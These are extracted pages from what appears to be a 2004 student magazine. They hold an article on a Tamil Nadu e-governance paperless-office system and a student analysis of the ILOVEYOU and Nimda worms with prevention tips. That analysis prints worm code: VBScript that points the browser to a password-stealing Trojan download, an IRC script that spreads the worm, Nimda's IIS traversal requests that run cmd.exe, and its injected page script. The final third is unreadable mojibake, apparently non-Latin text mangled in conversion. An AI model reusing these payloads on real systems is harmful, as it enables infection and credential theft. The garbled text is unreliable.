The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn 